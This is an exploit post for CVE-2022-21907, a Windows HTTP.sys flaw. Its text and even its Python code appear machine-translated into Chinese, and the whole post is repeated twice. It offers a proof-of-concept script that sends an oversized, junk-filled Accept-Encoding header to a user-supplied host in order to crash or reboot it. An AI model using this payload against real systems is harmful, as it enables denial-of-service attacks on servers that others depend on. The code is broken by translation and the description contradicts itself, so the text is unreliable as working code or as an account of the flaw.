## title: Windows 10 V21H1 -HTTP协议堆栈远程代码执行
##作者: nu11secur1ty
## date: 01.14.2022
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/download/details.aspx?id=48264
##参考: https://msrc.microsoft.com/update-guide/en-us/vulnerability/cve-2022-21907
## CVE-2022-21907
## Description:
Note:经过几个小时的测试和实验,我发现
没有脆弱性,这只是一个荒谬的
微软的实验。当我决定在上安装IIS软件包时
这些Windows平台,一切都还好,一切都已修补!
Windows Server 2019,Windows 10版本1809- 2018年不是
默认情况下很容易受到攻击,但是在我决定从1909年升级到
2004年。我发现一个严重的问题! Windows 10版本2004-2020
年仍然容易受到HTTP协议堆栈(HTTP.SYS)的影响。攻击
Method:缓冲区溢出- 拒绝服务并重新启动系统。这
存在问题,从去年开始报道,这是在CVE-2021-31166上报道的
仍然在那里!在那几天,我在帮助下再次进行了工作
和Axel Souchet 0vercl0k的协作作者。在
那天,我写了一个唯一的一行命令来利用这一点
脆弱性!
[+] exploit:
``python
#!/usr/bin/python
#作者@nu11secur1ty
#CVE-2022-21907
从Colorama Inim Init,Fore,Back,Style
init(convert=true)
导入请求
进口时间
打印(fore.red +'请输入您的主机. \ n')
打印(style.Reset_all)
打印(fore.yellow)
主机=输入()
打印(style.Reset_all)
打印(Fore.blue +'发送特别恶意的制作包裹,
请稍等.')
打印(style.Reset_all)
时间。
打印(fore.green)
#POC :)
poc=requests.get(f'http://{host}/',headers={'accept-incoding':
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
BBBBBBCCCACCACACACATATTATATAASDFAFFAFSDDAHJSKKKKKKKSKKJHHHHHHAYAU ** SISODDJJDJDJDJDJJJJJDJJJJJJJJJJJJJJJJJJJJTON ** S,\ \
rrarraryyyatttttattatthhsggugfurytiuhslkjlkjmnlsjljljsljsljjlkjhjhjvhgf,\ \
ttycttttcgfdsghdtuygkjhjhjhgjhgfutyreyutiyoupioolplmknlijopkolpkopjlkop,\ \ \
OOOAOOOOAOOOAOOOAOOOAOOOAOOOAOOOAOOOAOOOAOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
*********************************愚蠢的, *,',})
#没有必要的:)
打印(poc,'\ n')
打印(style.Reset_all)
````````
##复制:
[HREF](https://github.com/NU11SECUR1TY/WINDOWS10EXPLOITS/TREE/MASTER/2022/CVE-2022-21907)
##证明和利用
[HREF](https://www.nu11secur1ty.com/2022/01/cve-2022-21907.html)
##时间花费:
05:30:00
##作者: nu11secur1ty
## date: 01.14.2022
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/download/details.aspx?id=48264
##参考: https://msrc.microsoft.com/update-guide/en-us/vulnerability/cve-2022-21907
## CVE-2022-21907
## Description:
Note:经过几个小时的测试和实验,我发现
没有脆弱性,这只是一个荒谬的
微软的实验。当我决定在上安装IIS软件包时
这些Windows平台,一切都还好,一切都已修补!
Windows Server 2019,Windows 10版本1809- 2018年不是
默认情况下很容易受到攻击,但是在我决定从1909年升级到
2004年。我发现一个严重的问题! Windows 10版本2004-2020
年仍然容易受到HTTP协议堆栈(HTTP.SYS)的影响。攻击
Method:缓冲区溢出- 拒绝服务并重新启动系统。这
存在问题,从去年开始报道,这是在CVE-2021-31166上报道的
仍然在那里!在那几天,我在帮助下再次进行了工作
和Axel Souchet 0vercl0k的协作作者。在
那天,我写了一个唯一的一行命令来利用这一点
脆弱性!
[+] exploit:
``python
#!/usr/bin/python
#作者@nu11secur1ty
#CVE-2022-21907
从Colorama Inim Init,Fore,Back,Style
init(convert=true)
导入请求
进口时间
打印(fore.red +'请输入您的主机. \ n')
打印(style.Reset_all)
打印(fore.yellow)
主机=输入()
打印(style.Reset_all)
打印(Fore.blue +'发送特别恶意的制作包裹,
请稍等.')
打印(style.Reset_all)
时间。
打印(fore.green)
#POC :)
poc=requests.get(f'http://{host}/',headers={'accept-incoding':
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
BBBBBBCCCACCACACACATATTATATAASDFAFFAFSDDAHJSKKKKKKKSKKJHHHHHHAYAU ** SISODDJJDJDJDJDJJJJJDJJJJJJJJJJJJJJJJJJJJTON ** S,\ \
rrarraryyyatttttattatthhsggugfurytiuhslkjlkjmnlsjljljsljsljjlkjhjhjvhgf,\ \
ttycttttcgfdsghdtuygkjhjhjhgjhgfutyreyutiyoupioolplmknlijopkolpkopjlkop,\ \ \
OOOAOOOOAOOOAOOOAOOOAOOOAOOOAOOOAOOOAOOOAOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
*********************************愚蠢的, *,',})
#没有必要的:)
打印(poc,'\ n')
打印(style.Reset_all)
````````
##复制:
[HREF](https://github.com/NU11SECUR1TY/WINDOWS10EXPLOITS/TREE/MASTER/2022/CVE-2022-21907)
##证明和利用
[HREF](https://www.nu11secur1ty.com/2022/01/cve-2022-21907.html)
##时间花费:
05:30:00